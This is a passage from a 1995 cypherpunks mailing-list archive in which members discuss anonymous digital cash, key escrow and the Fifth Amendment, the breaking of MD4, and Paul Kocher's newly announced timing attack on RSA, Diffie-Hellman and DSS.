>anonymous cash systems inside of our country in the forseeable future.

But who's going to ask?  If an anonymous payment system springs up outside
the US, we can use it as a store of value if nothing else or for shopping
overseas. 
Domestically, we can convert non-anonymous payment systems into
semi-anonymous ones.  What counts is difficulty of transaction and market
demand not legal structure.  Thus, about five minutes after the "temporary
VISA card" travelers check substitutes are issued, I can start selling them
for (discounted) cash to all comers.  Likewise Ecash laundry servers letting
anonymous people use non-anonymous Ecash.

It remains to be seen how much customers value anonymity.  There should be a
niche market in any case.
----------------------
	I would also add that what one is doing when trading digital cash is
bartering for information. While the government has been successful in placing
limits on point-based bartering systems such as recordkeeping and taxes, the
lack of central books will make it quite hard to do so for digital cash. Trying
to outlaw barter arrangements, when what is being bartered is an apparantly
random string of numbers, is quite simply not going to work.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Sun, 10 Dec 95 13:14:35 PST
To: cypherpunks@toad.com
Subject: Re: Still more on the Digicash protocol
Message-ID: <01HYNCMO0E728Y4X93@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: futplex@pseudonym.com (Futplex)

It seems to me that end-to-end encryption is not significantly more important
for remailed messages. Really, there's less information in the message when
it emerges from the last remailer, so there's less to protect than in the
ordinary case. Furthermore, it may not even be feasible, since I may not have 
a public key I can associate with my correspondent.
------------------------------------------
	A possible solution: the correspondent generates a new public key and
sends it as part of the transaction. The key is then wiped afterward. Sorry if
this isn't possible due to something that I've misunderstood.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Sun, 10 Dec 95 13:24:43 PST
To: cypherpunks@toad.com
Subject: Re: Free calls to Govt (fwd)
Message-ID: <01HYND12J2KI8Y4X93@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I've been told that number is out of date. Since I forgot to save it,
would someone who did check and find out?
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Sun, 10 Dec 95 14:39:14 PST
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Free calls to Govt (fwd)
Message-ID: <199512102238.PAA23008@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I did and it did not work.


At 04:22 PM 12/10/95 EDT, you wrote:
>	I've been told that number is out of date. Since I forgot to save it,
>would someone who did check and find out?
>	Thanks,
>	-Allen
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John H. Wynne" <johnny@engineering.ucsb.edu>
Date: Sun, 10 Dec 95 16:45:54 PST
To: cypherpunks@toad.com
Subject: mailing List
Message-ID: <199512110045.AAA06366@gear>
MIME-Version: 1.0
Content-Type: text/plain


Please put me on your mailing list





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 10 Dec 95 13:50:45 PST
To: Ed Carp <ecarp@netcom.com>
Subject: Re: GAK and self-incrimination?
In-Reply-To: <199512101959.NAA14976@khijol>
Message-ID: <Pine.BSF.3.91.951210164405.3557F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, Ed Carp wrote:

> > Date:          Sun, 10 Dec 1995 02:57:36 -0800
> > To:            cypherpunks@toad.com
> > From:          Greg Broiles <gbroiles@darkwing.uoregon.edu>
> > Subject:       Re: GAK and self-incrimination?
> > Cc:            tcmay@got.net
> 
> > 
> > Tim May writes:
> > 
> > >Consider this hypo: I send an encrypted message to a partner in crime
> > >containing plans for future crimes and descriptions of past crimes. I don't
> > >GAK the message. The government prosecutes me under the Anti-Terrorism and
> > >Child Protection Act of 1997.
> > >
> > >My defense? That GAKKing the message would be tantamount to incriminating
> > >myself, which the Fifth Amendment protects me against.      
> > 
> > The Fifth protects you against *compelled* self-incrimination - in
> > particular, the right to be free from the "cruel trilemma" of
> > 
> >         o       conviction of a substantive crime, based on your
> >                 (true) testimony
> >         o       conviction of perjury, for lying when asked to incriminate
> >                 yourself
> >         o       contempt of court sanctions, for refusing to answer
> > 
> > but your hypo doesn't seem to create that forbidden situation. In
> > particular, you're free to simply not send the message at all. 
> 
> I don't believe that that would be a consideration.  Wasn't there a 
> court case a few years ago, in which a convicted criminal sued the 
> government, charging that filling out one of those forms that you 
> have to fill out when you buy a gun was a violation of his 5th 
> amendment rights?  What ever happened to that case?

I think you are referring to the so-called "exculpatory no" exception, 
which says that it is not a crime to say no on a government form when 
saying yes would admit a crime.

That exception has been given some validity in some Circuit Courts of 
Appeal, but not in the Sixth Circuit where I practice.  Perhaps others 
can comment on the Ninth Circuit, et al.  If the issue has made it to the 
Supreme Court, I'm unaware of it (although I'd almost certainly know if the 
doctrine was accepted by the Court and the Sixth Circuit therefore 
overruled...)

Morale:  It may still be important *where* you are, ahem, less than 
completely forthcoming.


EBD

 
> I also think that, besides the obvious 5th amendment problems, there 
> would be a 1st amendment problem - if you "*had* to use GAK to 
> communicate, that would be an impermissible restriction on your 1st 
> amendment rights.
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 10 Dec 95 13:55:15 PST
To: John Lull <lull@acm.org>
Subject: Re: Escrow expectations
In-Reply-To: <30cae91c.1391349@smtp.ix.netcom.com>
Message-ID: <Pine.BSF.3.91.951210165108.3557G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, John Lull wrote:

> Russell Nelson <nelson@crynwr.com> wrote:
> 
> > > Duncan Frissell writes:
> 
> > >  > If Clipper were mandated you might be able to resist a prosecution for
> > >  > "failure to file" keys or for double encrypting your transmissions if you
> > >  > could prove that you were transmitting illegal messages or evidence of a
> > >  > crime.  Just as those who possess illegal weapons are not required to
> >              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > >  > register them (self incrimination).  You have to be sure your traffic is
> >      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > 
> > You are mistaken here.  Failure to get a permit before turning a 
> > semi-auto firearm into a fully-auto machine gun, for example, is illegal 
> > as is possessing an unregistered machine gun ...
> 
> My understanding was that, for example, a convicted felon in posession
> of a handgun where handguns must be registered could be charged with
> being a convicted felon in posession of a firearm.  He could NOT be
> charged with posession of an unregistered handgun, because requiring
> him to register, when it is illegal for him to posess, is a violation
> of his first amendment rights.


In many/most federal jurisdictions, you are mistaken.  See my previous 
note about the exculpatory no exception.  Of course, he need 
only fill out the form if purchasing from a federally licensed firearms 
dealer, not, say, at a flea market.
 
EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Dec 95 14:14:35 PST
To: dan@milliways.org (Dan Bailey)
Subject: Re: Windows .PWL cracker implemented as a Word Basic virus
In-Reply-To: <199512090547.FAA21624@pop01.ny.us.ibm.net>
Message-ID: <199512102214.RAA22512@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Bailey writes:
> No, but they're doing something that makes me very uncomfortable:  As
> I read this, they're hashing the password and some other user
> information using MD4 then doing some proprietary permutations on
> that.  Given their record with security, I'd rather they used straight
> MD4, rather than throwing in something that we can't analyze.

MD4 has been broken. I thought that was common knowledge. MD5 is still
safe, of course.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 10 Dec 95 14:53:45 PST
To: perry@piermont.com
Subject: Re: Windows .PWL cracker implemented as a Word Basic virus
In-Reply-To: <199512102214.RAA22512@jekyll.piermont.com>
Message-ID: <95Dec10.175318edt.1732@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> MD4 has been broken. I thought that was common knowledge. MD5 is still
> safe, of course.
> 
> Perry

My understanding was that MD4 had been broken once, at the cost of 
much computer time.  Is it not still considered strong enough for 
casual use, much as a 512-bit RSA key is?



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Dec 95 14:56:29 PST
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Windows .PWL cracker implemented as a Word Basic virus
In-Reply-To: <95Dec10.175318edt.1732@cannon.ecf.toronto.edu>
Message-ID: <199512102256.RAA22618@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



SINCLAIR DOUGLAS N writes:
> My understanding was that MD4 had been broken once, at the cost of 
> much computer time.  Is it not still considered strong enough for 
> casual use, much as a 512-bit RSA key is?

You can get export licenses for systems using 512 bit RSA.

I'll leave the rest to your imagination.

I generally don't believe in using stupid algorithms if good ones are
around and cost no more. MD5 isn't more expensive than MD4 except if
you are in some very borderline sort of case.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 10 Dec 95 15:22:56 PST
To: cypherpunks@toad.com
Subject: Re: Windows .PWL cracker implemented as a Word Basic virus
Message-ID: <199512102320.SAA08162@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <95Dec10.175318edt.1732@cannon.ecf.toronto.edu>,
SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu> wrote:
> My understanding was that MD4 had been broken once, at the cost of 
> much computer time.

Not *that* much computer time...

In my copy of Hans Dobbertin's paper, the abstract says 

``An implementation of our 
attack allows to find collisions for MD4 in less than a minute on a PC.''

As far as I know, the difficulty of inverting MD4 is still an open
problem -- but why would you want to use a broken algorithm like MD4
when you can use MD2, MD5, or SHA?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMtrRCoZzwIn1bdtAQGQwQF+JlWjDgMCs+Y6nO/tUzrXcd9wJCrTLHx2
NlC+1bHspTvJSXSD29M73rfeyOfWOTtQ
=4jl6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sun, 10 Dec 95 11:25:43 PST
To: cypherpunks@toad.com
Subject: Re: Escrow expectations
In-Reply-To: <Pine.BSF.3.91.951210013752.18670D-100000@mercury.thepoint.net>
Message-ID: <30cae91c.1391349@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Russell Nelson <nelson@crynwr.com> wrote:

> > Duncan Frissell writes:

> >  > If Clipper were mandated you might be able to resist a prosecution for
> >  > "failure to file" keys or for double encrypting your transmissions if you
> >  > could prove that you were transmitting illegal messages or evidence of a
> >  > crime.  Just as those who possess illegal weapons are not required to
>              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >  > register them (self incrimination).  You have to be sure your traffic is
>      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> 
> You are mistaken here.  Failure to get a permit before turning a 
> semi-auto firearm into a fully-auto machine gun, for example, is illegal 
> as is possessing an unregistered machine gun ...

My understanding was that, for example, a convicted felon in posession
of a handgun where handguns must be registered could be charged with
being a convicted felon in posession of a firearm.  He could NOT be
charged with posession of an unregistered handgun, because requiring
him to register, when it is illegal for him to posess, is a violation
of his first amendment rights.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sun, 10 Dec 95 17:27:21 PST
To: cypherpunks@toad.com
Subject: [NOISE] REQ: "Markov" filter as recently posted in .shar form
Message-ID: <199512110127.UAA22346@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



Apologies, but I already tried all standard net searches on this. Someone
recently posted a .shar archive for a program called Markov, which filters
input Usenet posts and outputs a reasonable facsimile of that person's
"style". (It was posted in one of the "Alice" threads, in response to the
claim that posting styles could be a unique form of identification.) I
also looked on the archives at hks.net, but had no luck there. If some
kind person will post it again, I'll give it a home on my page of WWW
resources. I have the binary, and am impressed and amused enough to keep
it for regular use.. anyone for alt.usenet.kooks.markov? 

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
 EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
   Hate, hate your enemies  save, save your friends  find, find your place
 I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 10 Dec 95 17:48:45 PST
To: daw@quito.CS.Berkeley.EDU (David A Wagner)
Subject: MD4
In-Reply-To: <199512102320.SAA08162@bb.hks.net>
Message-ID: <95Dec10.204825edt.1935@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu> wrote:
> > My understanding was that MD4 had been broken once, at the cost of 
> > much computer time.
> 
> Not *that* much computer time...
I stand corrected.  I've not read the original paper.

> As far as I know, the difficulty of inverting MD4 is still an open
> problem -- but why would you want to use a broken algorithm like MD4
> when you can use MD2, MD5, or SHA?
Granted.  A brute force attack on MD4 takes 2^64 times more operations
to invert it than it does to find matching pairs if I remember correctly.
However a clever algorithm would reduce that.

Of course with MD5 as a plug-in replacement that's only 30% slower
this isn't a big problem.  Looks like the safety belts are worth while
after all.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Sun, 10 Dec 95 21:22:41 PST
To: John Lull <lull@acm.org>
Subject: Re: Paul Kocher's timing attack
In-Reply-To: <199512110312.WAA14627@nsa.tempo.att.com>
Message-ID: <30CBBF9E.6173@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John Lull wrote:
> ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps
> ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz

The ftp server does not seem to be working. You are better off starting at
	http://ftp.cryptography.com
or going directly to
	http://ftp.cryptography.com//timingattack.html

PK
-- 
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://www.netscape.com/people/karlton
Netscape Communications

     They that can give up essential liberty to obtain a little
     temporary safety deserve neither liberty nor safety.
		- Benjamin Franklin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 10 Dec 95 21:43:05 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: Paul Kocher's timing attack
In-Reply-To: <199512110312.WAA14627@nsa.tempo.att.com>
Message-ID: <30CBC3A3.6506@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


You can find info about Paul's attack at:

        http://www.cryptography.com

        --Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pck@netcom.com (Paul C. Kocher)
Date: Sun, 10 Dec 95 21:50:16 PST
To: cypherpunks@toad.com
Subject: Announce: Timing cryptanalysis of RSA, DH, DSS
Message-ID: <199512110548.VAA08989@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




I've just released details of an attack many of you will find 
interesting since quite a few existing cryptography products and 
systems are potentially at risk.  The general idea of the attack is
that secret keys can be found by measuring the amount of time used to
to process messages.  The paper describes attacks against RSA, fixed-
exponent Diffie-Hellman, and DSS, and the techniques can work with 
many other systems as well. 

My research on the subject is still in progress and the current paper 
does not include many of my findings.  I will eventually publish a full 
paper, but am releasing a preliminary draft now to alert the community 
as quickly as possible.  A copy of the abstract is attached at the end 
of this message and the full text can be downloaded in PostScript 
format from:

  ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps
  ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz

I've also made an HTML version which is accessible at:

  http://www.cryptography.com

(The HTML uses subscripts and superscripts which aren't supported 
in older web browsers.  The PostScript version is the "official" 
one and looks nicer.)

The results have already been seen by Matt Blaze, Martin Hellman, Ron 
Rivest, Bruce Schneier, and many others.  While the full significance
of the attack is not yet known, I think everyone who has seen it 
considers it important (including Netscape who awarded me a $1000 
bugs bounty prize). 


    ABSTRACT.  Cryptosystems often take slightly different 
    amounts of time to process different messages. With network-
    based cryptosystems, cryptographic tokens, and many other 
    applications, attackers can measure the amount of time used 
    to complete cryptographic operations.  This abstract shows 
    that timing channels can, and often do, leak key material.  
    The attacks are particularly alarming because they often 
    require only known ciphertext, work even if timing 
    measurements are somewhat inaccurate, are computationally 
    easy, and are difficult to detect.  This preliminary draft 
    outlines attacks that can find secret exponents in Diffie-
    Hellman key exchange, factor RSA keys, and find DSS secret 
    parameters.  Other symmetric and asymmetric cryptographic 
    functions are also at risk. A complete description of the 
    attack will be presented in a full paper, to be released 
    later. I conclude by noting that closing timing channels 
    is often more difficult than might be expected. 


Cheers,
Paul Kocher

*********************************************************************
VERY IMPORTANT: If you send me e-mail, please understand that I
probably won't have time to respond to all who write.  Please keep
messages SHORT and send them to pck@cryptography.com (**not** my
netcom address -- misdirected messages will be ignored).  PGP when
used for e-mail is not vulnerable to the attack.  Please state in
your note whether you would like a reply.
******************************************************************** 

__________________________________________________________________________
Paul C. Kocher           Independent cryptography/data security consultant
E-mail: pck@cryptography.com (please see above before replying)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sun, 10 Dec 95 13:54:44 PST
To: cypherpunks@toad.com
Subject: Re: Escrow expectations
In-Reply-To: <Pine.BSF.3.91.951210013752.18670D-100000@mercury.thepoint.net>
Message-ID: <30cb569a.6612409@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995 19:25:23 +0000 (GMT), I wrote:

> him to register, when it is illegal for him to posess, is a violation
> of his first amendment rights.
         ^^^^^

I meant FIFTH, not first.  Sorry. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sun, 10 Dec 95 19:14:36 PST
To: cypherpunks@toad.com
Subject: Paul Kocher's timing attack
Message-ID: <199512110312.WAA14627@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Kocher's brutally clever timing attack against on-line
implementations of RSA, DSA and fixed-exponent Diffie-Hellman
is reported on page A1 of Monday's New York Times ("Secure Digital
Transactions Just Got a Little Less Secure" by John Markoff).

The attack requires only a few thousand ciphertext samples and works
against most implementations of public-key cryptosystems in which
the attacker can measure accurately the target's computation time for
each sample.

I think Kocher's paper is online somewhere; I'll post the URL
when I find it.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Siberia" <klong@phoenix.net>
Date: Sun, 10 Dec 95 20:26:02 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <199512110425.WAA13887@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


ftp://ftp.aimnet.com/users/jnavas/winpmail/

On 10 Dec 95 at 4:07, Adam Hupp wrote:

> Where can you get the Open Encryptor PGP interface?

Namaste'

Kimberly Long
klong@phoenix.net

What is life?  It is the flash of a firefly in the night.  It is the breath of a 
buffalo in the wintertime.  It is the little shadow which runs across the 
grass and loses itself in the sunset.
                                              ~Crowfoot 1821-1890         )O( 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Dec 95 22:36:02 PST
To: cypherpunks@toad.com
Subject: *fnord* "Encryption Flaw Rattles Security Industry *fnord*
Message-ID: <199512110634.WAA02677@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Encryption Flaw Rattles Comuter Security Industry"

SAN FRANCISCO - The discovery of a vulvnerability has shaken
the computer world's faith in the safe use of the data-security
technologies on which most current and planned electronic
banking, shopping and "digital cash" systems are based.

The vulnerability has been found in a class of technologies
known as public-key encryption - designed to provide electronic
transactions by scrambling data so they can be read only by
people with the proper mathematical keys to the code.

The flaw was identified by Paul C. Kocher, a 22-year-old
researcher, who demonstrated a way that an electronic
eavesdropper who is able to monitor the repeated process
of unscrambling the incoming messages could figure out the private key.  It can be done by repeatedly keeping track
of the precise length of time it takes to unscramble each
message.

--From TimesFax, Mon. Dec. 11 Internet Edition






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Dec 95 22:35:59 PST
To: cypherpunks@toad.com
Subject: *fnord* "Encryption Flaw Rattles Security Industry *fnord*
Message-ID: <199512110634.WAA02690@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Encryption Flaw Rattles Comuter Security Industry"

SAN FRANCISCO - The discovery of a vulvnerability has shaken
the computer world's faith in the safe use of the data-security
technologies on which most current and planned electronic
banking, shopping and "digital cash" systems are based.

The vulnerability has been found in a class of technologies
known as public-key encryption - designed to provide electronic
transactions by scrambling data so they can be read only by
people with the proper mathematical keys to the code.

The flaw was identified by Paul C. Kocher, a 22-year-old
researcher, who demonstrated a way that an electronic
eavesdropper who is able to monitor the repeated process
of unscrambling the incoming messages could figure out the private key.  It can be done by repeatedly keeping track
of the precise length of time it takes to unscramble each
message.

--From TimesFax, Mon. Dec. 11 Internet Edition






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Dec 95 22:40:19 PST
To: cypherpunks@toad.com
Subject: *fnord* Addition info *fnord*
Message-ID: <199512110638.WAA02958@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



From: pck@netcom.com (Paul C. Kocher)
Subject: Announce: Timing cryptanalysis of RSA, DH, DSS
Message-ID: <pckDJEEzH.DJ3@netcom.com>
Organization: NETCOM On-line Communication Services (408 261-4700 guest)
Date: Mon, 11 Dec 1995 01:33:17 GMT
Lines: 67
Sender: pck@netcom20.netcom.com

I've just released details of an attack many of you will find 
interesting since quite a few existing cryptography products and 
systems are potentially at risk.  The general idea of the attack is
that secret keys can be found by measuring the amount of time used to
to process messages.  The paper describes attacks against RSA, fixed-
exponent Diffie-Hellman, and DSS, and the techniques can work with 
many other systems as well. 

My research on the subject is still in progress and the current paper 
does not include many of my findings.  I will eventually publish a full 
paper, but am releasing a preliminary draft now to alert the community 
as quickly as possible.  A copy of the abstract is attached at the end 
of this message and the full text can be downloaded in PostScript 
format from:

  ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps
  ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz

I've also made an HTML version which is accessible at:

  http://www.cryptography.com

(The HTML uses subscripts and superscripts which aren't supported 
in older web browsers.  The PostScript version is the "official" 
one and looks nicer.)

The results have already been seen by Matt Blaze, Martin Hellman, Ron 
Rivest, Bruce Schneier, and many others.  While the full significance
of the attack is not yet known, I think everyone who has seen it 
considers it important (including Netscape who awarded me a $1000 
bugs bounty prize). 


    ABSTRACT.  Cryptosystems often take slightly different 
    amounts of time to process different messages. With network-
    based cryptosystems, cryptographic tokens, and many other 
    applications, attackers can measure the amount of time used 
    to complete cryptographic operations.  This abstract shows 
    that timing channels can, and often do, leak key material.  
    The attacks are particularly alarming because they often 
    require only known ciphertext, work even if timing 
    measurements are somewhat inaccurate, are computationally 
    easy, and are difficult to detect.  This preliminary draft 
    outlines attacks that can find secret exponents in Diffie-
    Hellman key exchange, factor RSA keys, and find DSS secret 
    parameters.  Other symmetric and asymmetric cryptographic 
    functions are also at risk. A complete description of the 
    attack will be presented in a full paper, to be released 
    later. I conclude by noting that closing timing channels 
    is often more difficult than might be expected. 


Cheers,
Paul Kocher

*********************************************************************
VERY IMPORTANT: If you send me e-mail, please understand that I
probably won't have time to respond to all who write.  Please keep
messages SHORT and send them to pck@cryptography.com (**not** my
netcom address -- misdirected messages will be ignored).  PGP when
used for e-mail is not vulnerable to the attack.  Please state in
your note whether you would like a reply.
******************************************************************** 

__________________________________________________________________________
Paul C. Kocher           Independent cryptography/data security consultant
E-mail: pck@cryptography.com (please see above before replying)

========
Xref: news2.new-york.net sci.crypt:5320
Path: news2.new-york.net!spcuna!uunet!in1.uu.net!newsfeed.internetmci.com!howland.reston.ans.net!ix.netcom.com!netnews
From: jmrubin@ix.netcom.com (Joel M. Rubin)
Newsgroups: sci.crypt
Subject: Re: Announce: Timing cryptanalysis of RSA, DH, DSS
Date: 11 Dec 1995 04:35:47 GMT
Organization: Union of anti-organizationalists
Lines: 11
Message-ID: <4agcf3$enr@ixnews2.ix.netcom.com>
References: <pckDJEEzH.DJ3@netcom.com>
NNTP-Posting-Host: ix-sf17-18.ix.netcom.com
X-NETCOM-Date: Sun Dec 10  8:35:47 PM PST 1995
X-Newsreader: WinVN 0.99.7

I just saw a small article with your name on page 1 of the N.Y. Times 
Fax 8-page Internet Edition. (Monday, December 11, 1995)

They change the edition at about 10:30-11 P.M. Eastern Standard Time 
(0330-0400 the next GMT day) so if you read this before then, you might 
want to download http://nytimesfax.com/times.pdf.

It is in Adobe Acrobat format.

Of course, there is probably a larger article in the paper edition.


========
From: jmrubin@ix.netcom.com (Joel M. Rubin)
Newsgroups: sci.crypt
Subject: Re: Announce: Timing cryptanalysis of RSA, DH, DSS
Date: 11 Dec 1995 04:38:58 GMT
Organization: Union of anti-organizationalists
Lines: 7
Message-ID: <4agcl2$enr@ixnews2.ix.netcom.com>
References: <pckDJEEzH.DJ3@netcom.com>
NNTP-Posting-Host: ix-sf17-18.ix.netcom.com
X-NETCOM-Date: Sun Dec 10  8:38:58 PM PST 1995
X-Newsreader: WinVN 0.99.7

In case you don't already know, there is an article about your work in 
Monday's N.Y. Times. I just read a very small version of it in 
http://nytimesfax.com/times.pdf. (Adobe Acrobat-format 8-page edition)

The N.Y. Times Fax on the web changes edition about 10:30 or 11 P.M. New 
York time so if you want it, get it before then.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Dec 95 22:57:51 PST
To: cypherpunks@toad.com
Subject: Time-based cryptanalysis: How to defeat it?
Message-ID: <199512110656.WAA03942@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



Assuming Alice is decrypting a secret message sent to her
by Bob (on her very slow C64 ;), and Mallet is watching
with a stopwatch in hand, hoping to determine Alice's secret
key...

It would be good to place inside the decryption routines
a timer (WELL PLACED!) that waits a random-number of cycles
(based on key-strokes, mouse position, etc.) to defeat this
type of cryptanalysis?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Dec 95 23:50:09 PST
To: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Subject: Re: GAK and self-incrimination?
Message-ID: <199512110749.XAA11099@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:57 AM 12/10/95 -0800, you wrote:
>The Fifth protects you against *compelled* self-incrimination - in
>particular, the right to be free from the "cruel trilemma" of
>
>        o       conviction of a substantive crime, based on your
>                (true) testimony
>        o       conviction of perjury, for lying when asked to incriminate
>                yourself
>        o       contempt of court sanctions, for refusing to answer

Testimony was often compelled by more direct means than threatened
contempt citations.  Piling rocks on people until they talked was
still in use in the 1600s, unless I've got my dates wrong.
It may have gone out of fashion slightly after witch-burning,
but was still in recent cultural memory of the Constitution's authors.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Dec 95 23:49:59 PST
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: More FUD from First Virtual
Message-ID: <199512110750.XAA11161@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:51 AM 12/10/95 -0500, Nathaniel Borenstein <nsb@fv.com> (Tense Hot
Alien In Barn) wrote:

>In any event, I could write a virus that sits in
>front of the e-cash program and steals your keys when next you run the
>e-cash program.  Software's just too easy to fool.  That's why I regard
>the risk of catastrophe as being fairly large in software-based e-cash
>schemes.

How is this different for an ecash program vs. a First Virtual email
